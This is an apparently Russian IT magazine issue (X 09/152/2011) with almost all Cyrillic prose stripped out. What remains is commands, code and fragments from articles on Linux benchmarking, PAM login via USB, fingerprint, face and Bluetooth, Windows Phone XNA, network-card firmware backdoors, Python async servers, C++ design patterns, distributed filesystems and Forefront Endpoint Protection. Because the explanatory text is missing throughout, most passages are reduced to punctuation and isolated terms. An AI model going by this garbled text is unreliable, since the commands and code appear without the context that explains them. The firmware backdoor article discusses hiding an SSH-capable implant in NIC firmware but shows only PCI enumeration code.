openbenchmarking.org.
28 2011 Southern California Linux Expo. :
41258 ;
89,217 PTS (
openbenchmarking.org);
32189 PCI- 16536 USB;
325351 .

CPU 7-zip
.
:
execution time (avg): 32.6897
:
execution time (avg): 29.8387

sysbench ,
CPU. . :
$ sysbench --test=memory --memory-oper=read run

20,0857 19,5404 .
Ubuntu
CPU Intel
GPU Nvidia
Asus
HDD Samsung
FS ext4

. , :
$ mbw 512 | grep AVG

512 . ,
.

mbw-,
(, ).
:
AVG Method: MEMCPY Copy: 2765.609 MiB/s
AVG Method: DUMB Copy: 4248.589 MiB/s
AVG Method: MCBLOCK Copy: 11930.338 MiB/s

:
AVG Method: MEMCPY Copy: 5372.418 MiB/s
AVG Method: DUMB Copy: 7563.436 MiB/s
AVG Method: MCBLOCK Copy: 13755.269 MiB/s

sysbench .
$ sysbench --test=memory run

X 09 /152/ 2011

HDD

HDD . , hdparm:
hdparm -t /dev/sda

2,5" HDD 5400RPM 75,80 MB/sec. SSD Intel


320 222,93 MB/sec. , .
,
sysbench. -, :
seqrd ;
seqwr ;
seqrewr ;
rndrd ;
rndwr ;
rndrw .

. , . , :
$ sysbench --test=fileio --file-total-size=10G \
--file-test-mode=seqrd prepare

test.
'--file-total-size' , , . :
$ sysbench --file-total-size=10G --test=fileio \
--file-test-mode=seqrd run

099

UNIXOID

.
iozone.xls (
), , /.
LibreOffice
. - , ,
. iozone ,
gnuplot.

sysbench:

- . ,
Phoronix Test Suite ( PTS).
GPLv3.
,
, Ubuntu:

( ):
# apt-get install phoronix-test-suite
$ sysbench --test=fileio --file-total-size=10G \
--file-test-mode=seqrd cleanup

:
*
*
*
*

seqrd
seqwr
rndrd
rndwr

42.675Mb/sec,
47.377Mb/sec,
1.3463Mb/sec,
1.5153Mb/sec,

2731 IOPS
3032 IOPS
87 IOPS
97 IOPS

263.1Mb/sec, 16838 IOPS


121.95Mb/sec, 7804 IOPS
390.63Mb/sec, 25000 IOPS
70.559Mb/sec, 4515 IOPs

SSD:
*
*
*
*

seqrd
seqwr
rndrd
rndwr

bonnie++.
: ( ),

.
CPU ( ) . bonnie++
plain-text 80 , .
html:
$ bonnie++ -n 1024 | tail -1 | bon_csv2html \
> bon_result.html

'-n' ,
(
1024). , /
, (
+++++).
SSD (129 Mb/sec)
(315 Mb/sec) , sysbench.
48348 ,
6464 .
1090971 .
, , , iozone.
:
$ iozone Ra g 10G > iozone.xls

'-a' , '-R' Excel


, '-g'
( ). ,

100

PHP
. , (phoronix-testsuite.com) deb- . Live-,
, 3.4 ( )
. Live- ,
,
.
3.0 GUI, , PHPGTK2, , . ,
- GUI CLI- ,
. ,
:
$ phoronix-test-suite interactive

:
$ phoronix-test-suite list-available-tests

:
/
.
openbenchmarking.org,
allow_url_fopen, file_uploads, allow_url_include PHP.
,
. : System, Processor, Memory,
Disk, Graphics, Network .
, Network : Loopback TCP Network Performance.
PTS 3.2.1 118 46
.
, - . ,
:
$ phoronix-test-suite info compress-7zip

, , ,
( ,
, 10 ). ,

$ phoronix-test-suite make-download-cache

~/.phoronix-test-suite/download-cache/,
.
7-zip:
$ phoronix-test-suite benchmark compress-7zip
X 09 /152/ 2011


PTS
7-zip . PTS
, , - .
.
, PTS . , . :
$ phoronix-test-suite list-available-suites

, compilation:
*
*
*
*
*

pts/build-apache
pts/build-php
pts/build-mplayer
pts/build-linux-kernel
pts/build-imagemagick


, .
$ phoronix-test-suite list-available-virtual-suites

, :
* all ;
* installed ;
* system|processor|graphics
.

PTS HTML-,
. merge-results.
show-result.
, PTS -
.
, openbenchmarking.org , PTS
. , ( )
.
300 .
Linux
. , ,
, .
, openbenchmarking.org,

PTS, , , . PTS
openbenchmarking.org :
X 09 /152/ 2011

Phoronix Test Suite


$ phoronix-test-suite openbenchmarking-login

PTS
. openbenchmarking.org
: ~/.phoronix-test-suite/test-profiles/pts,
, , , .
, build-php ,
php 5.2.9, , .
downloads.xml -
pre- postinstall.sh.

? , , speedtest.net internet.yandex.ru.
- (,
Ubuntu). , - .
?
nc.
nc, 1234:
$ nc -q 0 -l 1234 > /tmp/big_file

- ,
:
$ time cat /tmp/big_file | nc -q0 server_IP 1234

, ,
, iperf.
:
# apt-get install iperf

:
$ iperf -s

TCP/5001. :
$ iperf -c server_host

Bandwidth .
, '-t' .
iperf TCP-. UDP, '-u' . UDP
, ,
. z

101

UNIXOID
(execbit.ru)


,
?
, , ,
SSH
, ?
, , ,
.
. sexhero iamsuperman
.
,
, ,
-

102

, ,
. XXI , ,
,
,
. .
, - , ,
- .
X 09 /152/ 2011

fprint_demo libfprint


. :
, ,
.
, .
,
( ,
). ?
USB-. , ,
,
, .
,

PAM- pam_usb (pamusb.org),
,
,
.
, , .

, , ,
,

( - ,
,
, ).

, , pam_usb
. (SD, MMC) . pam_usb
. .
1. libpam_usb.so :
$ sudo apt-get install libpam-usb pamusb-tools

2. ,
, USB-
:
$ sudo pamusb-conf --add-device
X 09 /152/ 2011

pam_usb pam_fprint PAM


pam_usb
, 2 . Udisks ( ,
,
-), ,
.
3. pam_usb ,
(
vasya):
$ sudo pamusb-conf --add-user vasya

4.
, . -
, :
$ sudo pamusb-check vasya

5. pam_usb ,
. Ubuntu ,
Debian, /
etc/pam.d/common-auth.
( ):
\auth required pam_unix.so

:
auth sufficient pam_usb.so

PAM, pam_usb,
, . ,
, , sufficient
required. ,
, ( , ), pam_usb
, pamusb-agent.
pamusb-agent
.
, /etc/pamusb.conf :

INFO

info
/etc/
pam.d/common-auth
Gentoo Mandriva
/etc/
pam.d/system-auth,
FreeBSD
/
etc/pam.d/system.
ArchLinux
PAM-

.


/
etc/nologin SSH-.


root
.

103

UNIXOID


USB-Flash

/etc/pamusb.conf
USB-

<user id="_">
<device>_</device>
...
<agent event="lock">
gnome-screensaver-command --lock</agent>
<agent event="unlock">
gnome-screensaver-command --deactivate</agent>
...
</user>

Gnome. pamusb-agent
, gnome-screensaver-command --lock gnomescreensaver-command --deactivate .
pamusb-agent :
$ pamusb-agent

, :
$ cd ~/.config/autostart
$ ln -s /usr/bin/pamusb-agent pamusb-agent

pam_usb
, -.
SD- ,
, (
USB-). , .
. ,
,
Windows. freedesktop.org
fprint (www.freedesktop.org/wiki/Software/fprint),

PAM-,
.
libfprint ,
:
$ sudo apt-get install libfprint0 \
libpam-fprint fprint-demo

104

$ fprint_demo

, .
pam_fprint_enroll,
, :
# pam_fprint_enroll enroll-finger 7

7 .
fprint , 1 , 10 .
, pam_fprint PAM , /etc/pam.d/
common-auth, auth required pam_unix.so
, pam_fprint:
auth sufficient pam_fprint.so

, .
,
, -.
,
, ,
.
Linux- ,

pam-face-authentication (www.pam-face-authentication.
org), ,
, PAM- .

Ubuntu. , ,
. ,
,
. Ubuntu ( )
, :
$ sudo apt-get install build-essential cmake \
qt4-qmake libx11-dev libcv-dev libcvaux-dev \
libhighgui4 libhighgui-dev libqt4-dev \
libpam0g-dev
X 09 /152/ 2011

:
$ cd
$ wget http://goo.gl/dpD1s
$ tar -xzf pam-face-authentication-0.3.tar.gz

cmake, :
$ cd pam-face-authentication-0.3
$ cmake && make
$ sudo make install

Ubuntu antonio.chiurazzi:
$ sudo add-apt-repository ppa:antonio.chiurazzi/ppa
$ sudo apt-get update
$ sudo apt-get install pam-face-authentication

:
$ qt-facetrainer

, Capture.
, .
. .
pam_face_authentication.so PAM-. /etc/pam.d/gdm /
etc/pam.d/kdm ( KDE)
:
auth sufficient pam_face_authentication.so enableX

/etc/pam.d/common-auth , ,
/bin/login /bin/su, pam_face
.
PAM-. () /usr/share/pam-configs/face_authentication
:
Name: Manually installed face_authentication profile
Default: yes
Priority: 900
Auth-Type: Primary
Auth:
[success=end default=ignore]
pam_face_authentication.so enableX

:
$ sudo pam-auth-update --package face_authentication

21- . ,
,
, , ,
.
?
, . USB-, , . , , MAC-,
IMEI, .
,
X 09 /152/ 2011

MAC- Bluetooth.
, Bluetooth , , MAC,
Bluetooth-.
, USB
,
. ,
.
, Bluetooth, ,
.
hcitool ( bluez-utils) :
$ hcitool scan

MAC-, . libpam_blue (
pam_blue, ):
$ sudo apt-get install libpam_blue

/etc/security/bluesscan.conf
:
#
general {
# ( 3 15)
timeout = 15;
}
#
mylogin = {
name = ;
bluemac = MAC- ;
}

, /etc/pam.d/
common-auth :
auth sufficient pam_blue.so

, pam_unix.so.
.
pam_blue, , MAC-
. .

Linux .
,
,
. ,
,
, ,
.
,
. . ,
. , , ,
. , , ,
. z

105

CODING
yurembo (yazevsoft@gmail.com)

WINDOWS
PHONE 7.1
,
!
Microsoft
Windows Phone 7.1 Mango.
(
)
,
.
-: , .
, , .
, . ,
.
Windows Phone 7.0
.
, . ,
,

. ,

106


Windows Phone Marketplace-. .
DevCon11
Microsoft , Windows Phone 7.1 (Mango)
.
( :), ,

. WP (
), .
, , : ,
.
.
X 09 /152/ 2011

DVD
dvd





. !

. 1.

. 2.

Windows Phone 7.1 Mango

XNA .

( Windows
Phone Rich Graphics Application (4.0)).
,
XNA. . XNA DirectX. ,
, ,
,

. , Microsoft ,
: Windows,
Xbox 360 Windows Phone 7.x.
, , Windows,
. ,
XNA.
.NET Framework
(2002 ) ,
( ,
), ,
Managed DirectX
DirectX, .NET.
DirectX, C++, , . MDX 2.0. : ,
(, , .NET)
,
. , . Microsoft
DirectX , SDK
. 2006 XNA,
SDK,
, , , DirectX.
API,
,
( .), XNA
.

.NET Framework, (
PC ( Windows) Xbox 360).

,
WP, ,
Windows. ,

Microsoft Windows Mobile 6.5,
eMbedded Visual tools,
eMbedded Visual
Basic eMbedded Visual C++.
, Visual Studio 2010,
.NET Framework 4.0 ( , ,
WP 7.1) , ,
Windows Phone Developer Tools
WP 7.1,
Microsoft). , , : Visual Studio 2010 Express,

WP, .NET Framework 4.0, Silverlight 4.0, XNA 4.0, Windows
Phone Emulator. , ( )
WP 7.1,
DirectX 10.

Windows Vista -,
Windows 7 Starter Edition ( ,
:)).
, VS 2010,
C# Visual Basic
. WP-, VS 2010
(. 1).

XNA vs. Silverlight

Windows Phone : Silverlight XNA. .NET. , Windows


Phone .
, Silverlight
( ,
, Windows). ,
XAML
, VS
.
(
), . ,
X 09 /152/ 2011

3D-


Windows Phone 7.1.



.


.

HTTP://WWW
links

create.msdn.com

WP .

INFO

info

,

3D-.
.
trueSpace

. : www.caligari.com.

107

CODING

spriteBatch.Begin();
spriteBatch.Draw(background, new Rectangle
(0, 0, 800, 480), Color.White);
spriteBatch.End();

. 3. 3D
? 3D- WP 7.1.
VS 2010
Visual C# XNA Game Studio 4.0 Windows Phone Game
(4.0).
. .
WP (480800),
,
. WP
30 fps ( ,
TargetElapsedTime). , WP, DirectX 10, WP DX 9.
, , DX 9. XNA , DX ,
. PC Xbox 360
HiDef,
, DX.
, WP , Reach,
DX 9 .
,
- .
, XNA 4.0 .
. ,
(. 2).

( ).
.
background.jpg. , , , XNA.

. , , , ,
,
. ,
, .

,
. -, Game1.cs,
Game1 :
this.graphics.PreferredBackBufferHeight = 480;
this.graphics.PreferredBackBufferWidth = 800;
this.graphics.IsFullScreen = true;

, . LoadContent() spriteBatch
: background = Content.
Load<Texture2D>("Textures/background");. .
Draw, TODO :

108

SpriteBatch: Begin
( ),
, .
. Draw . (
, ):
, (
). (-, , . .)
SpriteBatch , Begin.
:
. . XNA : *.x *.fbx.
DirectX, ,
, . ,
*.sdkmesh, . Microsoft

meshconvert,
X sdkmesh. *.fbx
Autodesk. , .

.
( trueSpace , ). -.
, ,
, -
.
.

, - ,
.

, ,

. object.cs
,
( ).
, , .
, ,
, XNA.
. . ,
, ,
. ,
,
. ,
.
C# .
Delphi :).
,

, XNA, Y
. DrawObj,
X 09 /152/ 2011

, model.
.
foreach ,

.

. BasicEffect : , - ,
, ,
. ,
, DirectX
. , DX 10, , .
-,
. , , .
XNA , . DrawObj
( foreach) .
, UpdateState,

rotMat-
.
SetupEffects .
,
. , .
trans,
( DrawObj (. ).
,
Game1,
Microsoft.Xna.Framework.Game, .
, ,
. Game1 , , Object Object car1 = new
Object(20); ,
,
. . :
projectionMatrix = Matrix.CreatePerspectiveFieldOfView
(MathHelper.ToRadians(45.0f),aspectRatio,1.0f,100.0f);
viewMatrix = Matrix.CreateLookAt(cameraPosition,
Vector3.Zero, Vector3.Up);

:
Y , ( ), .
:
( ,
X,Y,Z), , . LoadContent
, : car1.model = Content.
Load<Model>("Models/Hotrod");
:
car1.SetupEffects(projectionMatrix, viewMatrix);,
. Update,
Draw ,
Object.
UpdateInput,
, ,
. Draw
X 09 /152/ 2011

. , Object.
base.Draw(gameTime); . , , .
.
, , 3D (. 3).

. - *.wav- (, ) . : ,
, :
SoundEffect sound; //
SoundEffectInstance soundControl; //
bool isPlay = false; //

LoadContent , ,
:
sound= Content.Load<SoundEffect>("Music/jets014");
soundControl = sound.CreateInstance();
soundControl.IsLooped = true;
soundControl.Play();
isPlay = true;

UpdateInput Back :
if (GamePad.GetState(PlayerIndex.One).Buttons.Back ==
ButtonState.Pressed) {
if (isPlay) {
soundControl.Pause();
isPlay = false;
} else {
soundControl.Play();
isPlay = true;
}
}

.
. , ,
, , :)!


WP 7.1 , ,
.
,
: ,
. ,
Windows Phone 7.1.
, ,
( ,
WP7.1 :)) Windows
Phone Marketplace (,
2900 ).
,
, !
Windows Phone
! z

109

CODING
(stannic.man@gmail.com)

:
( , )
. (
) . ,
, ,
? !
110

X 09 /152/ 2011

(NIC)
RJ45

PHY block


Ethernet

MAC block

PCI-

NIC
()

NIC <===> PCI


, ,
,
,
, .
, ?
, ,
...
- . ...
.

.

(!)
SSH-,
. -,
( )
(prooflink: alchemistowl.org/arrigo/Papers/
Arrigo-Triulzi-PACSEC08-Project-Maux-II.pdf,
radioradar.net/news/electronics_news/avr_crumb644_net.
html).
, , : , , ,
-
. -Apache,
,
, , - PCI-

, , .
,
, ,

. , . . - ,
, .

,
, , ,
X 09 /152/ 2011

.
,
,
?

.
,
,
. , firmware
, , - .
, ,
.

TDI-NDIS-
NDIS-, , , ,
NdisRegisterProtocol.
. , , TDI NDIS IM- .
,
, .
NDIS_
MINIPORT_BLOCK
,
NDIS_MINIPORT_BLOCK !

NdisRegisterProtocol,
,
.
?
,
,
, PCI.
PCI-,
( ) , PCI-

() PHY MAC-.
RJ45- ,

DVD
dvd


pdf-,
PCI-,

, ,

PCI,
,
,

, .

HTTP://WWW
links

alchemistowl.org/
arrigo/index.html,
Arrigo Triulzi,


.

111

CODING

MAC-.
, ().
CPU, EEPROM-,
SRAM- , . EEPROM, , , MAC- ,
. EEPROM
. SRAM-
firmware, ,
/ . ,
,
. ,
,
.
EEPROM,
SRAM ? , .
PCI-.
PCI- , linear
burst ( ). ,
( ) ,
.

.
PCI , , Plug and Play (PnP).
PCI :
( /,
Microsoft) configuration space .
PCI
PCI Bus Demystified Doug Abbott,
.
PCI-, ,
, ,
PCI-. , :), ,
TDI NDIS, ,
. : ,
.
PCI -,
(memory-mapped I/O).
, , 64 .
32 , 32 / SRAM- .
, ,
PCI-.
PCI-
for (busNumber = 0; !adapterFound && moreBuses; busNumber++)
{
for (deviceNumber = 0;
!adapterFound && deviceNumber < PCI_MAX_DEVICES;
deviceNumber++) {
slotNumber.u.bits.Reserved = 0;
slotNumber.u.bits.DeviceNumber = deviceNumber;
slotNumber.u.bits.FunctionNumber = 0;
length = HalGetBusData(PCIConfiguration,
busNumber,
slotNumber.u.AsULONG,

112

configInfo,
sizeof(PCI_COMMON_CONFIG) );
}
}

, ,
EEPROM , EEPROM .
? -, EEPROM
non-volatile-. -,
. -,
, EEPROM . EEPROM?
, , ,
, ,
MAC-, firmware-,
: , , PXE (Preboot eXecution
Environment, ) .
, frimware
EEPROM ?
! ,
, :). ? ,
, (
PCI-):
. EEPROM
firmware ( ) EEPROM.
. firmware, , , ;
firmware,
;
MAC- .
, , ,
. , , , , : ,
? : ,
, - . ,
,
.
firmware, , ...
firmware,
. , .
, ,
,
. , , PoC,
.

? ! ,
, . , ,
, . , ,

, EEPROM,
, , , firmware.
PCI .

: PCI-based .
, , ,
. ,
:). ,
! z
X 09 /152/ 2011

1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! , .
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )

12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).

CODING
(adil.khashtamov@gmail.com, http://khashtamov.kz)

-
Python

,
-
.
? , !
?

, ,
.

(
, , ). -, ,
,
, . ,
. , , .
, .
10 , ,
10 . ,

114


DOS-.
, , .
, , . :
s = socket.socket(...)
s.setblocking(ISBLOCKING)
s.connect((host,port))
data = s.recv(1024)
# -
s.close()

, ,
.
X 09 /152/ 2011

Twisted


tornadoweb.org Tornado.
twistedmatrix.com
Twisted.
gunicorn.org WSGI Python-.
gevent.org , libevent.
nichol.as asynchronous-servers-in-python-

Python.
pycon.blip.tv PyCon.

, , ,
,
. , , ,
, // .
- -.
, Windows select(), Linux epoll(), poll(), FreeBSD
kqueue(). , ][
, horiffic, ,
.
(xakep.
ru/magazine/xa/042/058/1.asp . .).
, , ,
. ,
, .
.

, ? Python-
, . , ,
Django, ][
. (, ). ,
?
X 09 /152/ 2011

Tornado

, .

FriendFeed. , 2009
Facebook, . Tornado ,
,
.
Tornado. , ,
Django, .
, ! ,
Tornado .
, ,
. , web.py,
Tornado ,
:)
demos , , .
?
-? Tornado -.
MVC (model-view-controller),

, Django.

Twitter, Facebook, Google ,
. . MySQL,
,
Tornado , , MySQL-,
.
PostgreSQL,
MySQL
.

115

CODING

Tornado
Hello world Tornado :
Hello world Tornado
import tornado.ioloop
import tornado.web
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.write("Hello, world")
application = tornado.web.Application([
(r"/", MainHandler),
])
if __name__ == "__main__":
application.listen(8888)
tornado.ioloop.IOLoop.instance().start()

Tornado web.py .
http-,
front-end- nginx, -.
.
:
1. ,
.
2. ,
.
3.
. , .
:
1. .
2. Tornado , .

Twisted

, Twisted
Python.

116

, .
: TCP/UDP, SSL/
TLS, HTTP, SSH, FTP, IRC, NNTP, XMPP .
Twisted ,
.
, Twisted ,
, ,
. , Twisted
,
. ,
. , Twisted . , Twisted Tornado.
,
Python,
. , -
Twisted, , ,
, Tornado. Twisted (
Tornado Django)
SQL-.
:
1. .
2. .
:
1. , .
2. .

Gunicorn + Gevent

, , Python web-,
.
PyCon,
. WSGI-
Gunicorn Gevent (
WSGI- libevent).
, Gevent , , ,
. Gevent
()
, ,
X 09 /152/ 2011

asyncore
libevent ( Chromium, memcached),
,
. , ,
Gevent
libev, , libevent.

, urllib, ftplib - . ,
, ,
Gevent. , , Gevent:
Gevent
urls = ['http://www.google.com', 'http://www.yandex.ru',
'http://www.python.org']
import gevent
from gevent import monkey
monkey.patch_all()
import urllib2
def print_head(url):
print (' %s' % url)
data = urllib2.urlopen(url).read()
print ('%s: %s : %r' % (url, len(data), data[:50]))
jobs = [gevent.spawn(print_head, url) for url in urls]
gevent.joinall(jobs)

, Gevent
. , monkey.patch_all()
,
,
. , urllib2
,
,
.
X 09 /152/ 2011

:
1. .
2. .
:
1. .
2. , .

asyncore

,
, asyncore.
Asyncore -
( callback), , ,
. asyncore , NIH- (NIH not invented
here), , . , ,
,
, ,
.
, .

! , ,
, .
, - : ,
, ,
.
. ,

,
. ? ,
,
. , , ,
.

Django, . ,
, , ... z

117

CODING
deeonis (deeonis@gmail.com)

Python
-, , , . .
, , ,
. , .
, .

-
, ,
. . ,
, (,
) ,
.
, . -

,
. , .
- , , ,
- , , .
, , . , , .

. ,
, .
:

class MobilePhone
{
public:
void display() = 0;
void makeSound()
{
//
};
...
}
class Nokia3310 : public MobilePhone
{
void display()

118

{
//
};
}
class SiemensA35 : public MobilePhone
{
void display()
{
//
};
}

MobilePhone, : display() makeSound().


makeSound ,
. display ,
-,
.
, , mp3-. mp3
- ( ),
. ,
mp3 , . - !

, makePhoto
MobilePhone. ,
, Nokia 3310 -
:).
makePhoto
class MobilePhone
{
public:
void display() = 0;
void makeSound()
{
X 09 /152/ 2011

UML-
//
};
...
//
void makePhoto()
{
//
};
}
...
Nokia3310 mobilePhone;
// Nokia
//
mobilePhone.makePhoto();

.

.
( SMS) . , ,
makePhoto ,
, , ,
. , ,
mp3-.
.

, , X 09 /152/ 2011

,
. , , Java PHP,
C++ . ,
.
() iPhotoCamera,
makePhoto.
MobilePhone.
iPhotoCamera, 3310
.
iPhotoCamera
class iPhotoCamera
{
void makePhoto() = 0;
}
...
class MotorolaL9 : public MobilePhone, public iPhotoCamera
{
void makePhoto()
{
// ,
};
...
}
class MotorolaL7 : public MobilePhone, public iPhotoCamera
{

119

CODING

void makePhoto()
{
//
// ,
return;
};
}

C++
void makePhoto()
{
// , , , MotorolaL9
//
};
...
}

, , ,
, .
,
makePhoto(). - . , cpp makePhoto iPhotoCamera, ,
,
. : , CMOS
CCD...
makePhoto, .
, .
.

,
.
,
. ,
iPhotoCamera, , . , makePhoto
.

, iPhotoCamera. C++
:
makePhoto()
class iPhotoCamera
{
void makePhoto() = 0;
}
class DoPhoto : public iPhotoCamera
{
void makePhoto()
{
// ,
};
}
class CantDoPhoto : public iPhotoCamera
{

120

, : DoPhoto CantDoPhoto.
iPhotoCamera
makePhoto(). , ( ) . DoPhoto , CantDoPhoto
, makePhoto .

, . , 3310
. mp3-.
mp3
class iPhoneSound
{
void makeSound() = 0;
}
class PolyphonySound : public iPhotoSound
{
void makeSound()
{
// ,
};
}
class Mp3Sound : public iPhotoSound
{
void makeSound()
{
// , mp3
};
}

, . iPhoneSound
PolyphonySound Mp3Sound makeSound(). ,
,
, .

. mp3
-
.
,
.
. -
.
MobilePhone ,
iPhoneCamera, iPhoneSound.
MobilePhone
class MobilePhone
{
protected:
iPhotoCamera &photoBehavior;
iPhotoSound &soundBehavior;
public:
X 09 /152/ 2011

Nokia3310 nokla;
// 3310 ,

nokla.makePhoto();
//
nokla.makeSound();

Java
.

void display() = 0;
void makeSound()
{
soundBehavior.makeSound();
};
void makePhoto()
{
photoBehavior.makePhoto();
};
}


MobilePhone makePhoto makeSound, photoBehavior soundBehavior. ,

photoBehavior soundBehavior . , :
MobilePhone
class MotorolaL9 : public MobilePhone
{
MotorolaL9()
{
photoBehavior = new DoPhoto();
soundBehavior = new Mp3Sound();
};
}

-
. ,
. ,
.
,
.
, , .
, photoBehavior
soundBehavior MobilePhone,

? ,
. , mp3- , set-,
soundBehavior.


class MotorolaL9 : public MobilePhone
{
MotorolaL9()
{
photoBehavior = new DoPhoto();
soundBehavior = new Mp3Sound();
};
void setIPhoneSound(iPhoneSound &sound)
{
soundBehavior = sound;
};
}
...
MotorolaL9 motor;
// mp3
motor.makeSound();
//
motor.setIPhoneSound(new PolyphonySound());
//
motor.makeSound();

class Nokia3310 : public MobilePhone


{
Nokia3310()
{
photoBehavior = new CantDoPhoto();
soundBehavior = new PolyphonySound();
};
}

. , ,
,
.
.

...

MotorolaL9 motor;
//
motor.makePhoto();
// mp3
motor.makeSound();

X 09 /152/ 2011

, . ,
,
.
. z

121

SYN/ACK
(execbit.ru)

,
, ,

. ,
, .

,
,
. , ,
, .

,
( - ?)
, ,
. , ,
,

,
.
,
, .
:
1. . ,

. NFS UNIX CIFS Windows.


. ,
.
2. . , . ,
, .
GFS/GFS2 Red Hat OCFS2 Oracle.
, .
3. .
. ,

, ,
. GRID,
, . : Lustre, Ceph,
GlusterFS GoogleFS,
Google.

122

, ,
.

NFS, CIFS POHMELFS

,
( ,
UNIX) NFS,
Network File System.
NFS Sun Microsystems ( Oracle)
2.0 1989 , RFC1094 ( ,
, , , Sun).
, NFS
.
, (RPC), ,
. NFS
,
SunOS,
. NFS
-
, .
. , ,
NFS-,
(/etc/exports /etc/hosts.
allow) nfsd.
, .
,
, NFS
.
NFS .
, NFS

.
.

, X 09 /152/ 2011

POHMELFS,
Linux
( ).
NFS ,
cachecoherent. NFS ,

,
.
, A
(, ,
, ..),

, , ,


. readonly ,
,
, , .
NFS ,
.
.

OCFS2 GFS2


.
, ,
X 09 /152/ 2011





.
, ,
,
, .
, , SAN,
FibreChannel, iSCSI
AoE.
,
, ,
, .

.
, RAID,
SAN .
,
.
,

INFO

info

-
RADOS (http://ceph.
newdream.net/wiki/
RADOS_Gateway)

Ceph Amazon
S3.

123

SYN/ACK

Ceph ,

OCFS2
,
.
, ,
,
,
. , ,
.
, .
,
.
,
, , ,
.
inode. ,
,
inode , ,
GFS2 OCFS2, -

124

. ,
,
.

. -, ,

(, GFS2 DLM Distributed Lock Manager).

,
, . ,
,
NFS
.
,

(GPS2 OCFS2 ).
, -,
, , ,
.
fencing ,
, ,
, .
,
, ,
, , ,

.
,
.
. , (
), , ,
(
- ). ,
-
, ,
, X 09 /152/ 2011


POHMELFS (http://www.ioremap.net/projects/
pohmelfs),
Linux, ,
. :

( NFS).
.
.

( RAID)
.

.
.
NFS, POHMELFS ,

,

.

, .

,
,
-
. ,
,
,
.

Luste, Ceph GlusterFS


, ,
,
, ,
, ,
.

,
,
Lustre.
Lustre (www.lustre.com) Cluster
File Systems, Sun Microsystems 2007
. Lustre ( Linux
Cluster) ,

.
Lustre
, ,
.
:
1. (MDS),
, , , ,
..
.
/ ,
X 09 /152/ 2011

OCFS2
.
2. (OSS).
, , .
/
, ,
,

.
(OST),
, ,
.
3. (MGS). . MGS
.
, Lustre,
:
, . ,
,
() , .

(, /lustre).
/ -
,
, .
()
,
(

, ).
Lustre
.

125

SYN/ACK

Ceph Lustre
, ,
,
(,
,
,
).
Lustre
, POSIX
, . Lustre , -

Lustre-

,
,
.
, .
Ceph GlasterFS.
Ceph (http://ceph.newdream.net)
2007 , ,
, Lustre, . Fuse,
Linux, Linux, 2.6.34.
Ceph
. ,
.
,
.
, ,
,
, ,
.
.
Ceph . , ,
Linux-,
.
,
Fuse, Linux, BSD Mac OS X.


.
,
,
.
, , . z

126

X 09 /152/ 2011

SYN/ACK
grinder (grinder@ua.fm)


Forefront Endpoint Protection:
Windows
2010 Microsoft
Forefront Endpoint Protection, . ,
, .

Forefront Endpoint Protection


, .
. ,
, Microsoft. , ,
, , .
,
, . NAP (Network
Access Protection), Win2k8 (
12 ][ 2008 ).
, MS , Forefront ( Stirling, , ,
),
ISA Server, Intelligent Application
Gateway, Identity Lifecycle Managek .
Forefront , , , .
MS . ,
. MSRT (Malicious Software Removal
Tool), OneCare Windows Defender,
. MS Security
Essentials (Morro), WinXP-Win7. MSE ( ), MSE
.
Forefront Endpoint Protection, Win, , ,
. Forefront Client Security,
. FEP 2010 2010
. FEP 2012, -
.

FEP 2010
, ,
, ,
. , FEP

128

, , .
Windows, Windows Firewall,
AppLocker,
. ,
, . ,
,
, - .
FEP c IPS ( ) Network
Inspection System (NIS). , NIS
Forefront TMG 2010, FEP
, . Network Access Protection (NAP).
(Dynamic translation
and Emulation),
, . ,
. , ,
Microsoft Security Essentials
DSS (Dynamic Signature Service).
, (, ), ,
,
Microsoft DSS, SpyNet MRS (Microsoft
Reputation Services). ,
, , .
,
, .
, FEP ,

. FEP
,
,
.
, -
. ,
.
. ( X 09 /152/ 2011

HTTP://WWW
links


Forefront microsoft.
com/forefront.
TechNet,

Forefront Endpoint
Protection clck.ru/
FwSw.
-
( )
Forefront Endpoint
Protection clck.ru/
FiXr.

) , FEP

. ,
,
.
WinXP3/Vista/7
Win2k3/2k8/2k8R2.
Win7 Starter, Win7
Home Vista Basic .

. FEP
,
System Center Configuration Manager. ,
, FEP
.
, ,
SCCM (
08 ][ 2009 ).

,
,
. . ,
, .
FEP, ,
SCCM .
.
, FEP , , :).

SCCM 2007
R3 Win2k8R2
, FEP
2012, 2010.
FEP 2012 SCCM 2012,
.

, Win2k8R2. , .
X 09 /152/ 2011

(
), ,
SCCM 2012, Outlook,
. ,
.
FEP 2010
SCCM 2007 R3, FEP.
R3 ,
SP2, .
SCCM 2007 SP2
08 ][ 2009 ).
, Win2k8R2
,
:). . SCCM 2007,
Win2k3SP2/Win2k8/
R2 SQL Server 2k5SP3/2k8/R2.
, SQL
Analysis Services, Integration Services Reporting Services.
,
. ,

MSSQL , Standart/Enterprise.
,
SQL-
FEP Analysis
Reporting. MSSQL, SQL Server
Agent .

SPN (Service Principle Name) MSSQL.
:

INFO

info



Forefront UAG


09 ][ 2010
.
Forefront
TMG


11 ][ 2009
.
NAP

12 ][ 2008
), SCCM

08
2009 .

>setspn -A MSSQLSvc/srv01.example.org:1433
example\mssqlserver
Registering ServicePrincipalNames for
CN=Mssqlserver,CN=Users,DC=example,DC=org
MSSQLSvc/srv01.example.org:1433
Updated object

, , , , SPN

129

SYN/ACK

Forefront Endpoint Protection 2010

FEP, SCCM

, .
-d
.
, .
:
[Verbose] Retrieved SQL server account: Internal:
'EXAMPLE\ mssqlserver'; External: 'EXAMPLE\mssql'
[Verbose] Retrieved SQL SPN: MSSQLSvc/SRV01
[Verbose] Validating SPN. Account: EXAMPLE\mssqlserver.
SPN: mssqlsvc/srv01

Win2k8R2:
PS> Import-Module servermanager
PS> Add-WindowsFeature BITS,RDC,Web-WMI,Web-Dav-Publishing

SCCM 2007 SP2 .


R3 KB977384 (support.microsoft.
com/kb/977384) KB2271736 (support.microsoft.com/kb/2271736).

.

Forefront
Endpoint Protection 2012
FEP. FEP
Microsoft Forefront
Endpoint Protection 2010 (clck.ru/G-1V), ,
FEP.
, .
, , , . ,
SCCM
, MS.
, FEP 2010
:). .
.
( , 2012 ,
-):
Basic topology , SCCM, ;
Basic topology with remote reporting database , ,
;

130


Advanced topology ,
, ..
Install only Configuration Manager Console Extension for FEP 2010
SCCM 2007.
,
